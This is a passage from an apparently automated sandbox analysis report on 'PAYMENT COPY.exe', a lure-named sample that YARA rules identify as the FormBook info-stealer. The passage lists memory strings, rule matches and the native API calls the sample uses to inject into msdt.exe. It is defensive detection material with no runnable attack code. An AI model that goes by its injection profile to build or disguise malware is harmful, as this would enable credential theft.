          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://www.8dq98.com/enter/index.html
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: PAYMENT COPY.exe, 00000001.00000002.341477540.0000000000A0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: PAYMENT COPY.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19560 NtWriteFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B196D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8280 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8300 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE827A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004046A7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041BDDE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B6E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA20A8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB090
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91002
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADF900
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA22AE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0EBB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9DBD2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2B28
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE841F
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD0D20
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2D07
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1D55
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2EF7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF6E30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1FF1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DADFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAE824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D903DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEC86A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C6B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEBDDB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB6E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CDB150 appears 45 times
          Source: PAYMENT COPY.exe, 00000001.00000003.334044214.000000001F25F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
